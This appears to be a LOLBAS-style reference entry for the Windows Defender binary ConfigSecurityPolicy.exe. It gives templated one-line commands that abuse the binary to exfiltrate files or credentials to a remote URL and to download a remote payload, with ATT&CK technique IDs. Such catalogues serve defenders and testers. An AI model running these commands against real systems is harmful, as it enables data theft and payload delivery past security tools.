.. /ConfigSecurityPolicy.exe
Star

Upload
Download (INetCache)

Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

Paths:

Resources:

Acknowledgements:

Detections:

Upload

  1. Upload file, credentials or data exfiltration in general

    ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}
    Use case
    Upload file
    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1567

Download

  1. It will download a remote payload and place it in INetCache.

    ConfigSecurityPolicy.exe {REMOTEURL}
    Use case
    Downloads payload from remote server
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1105
    Tags
    Download: INetCache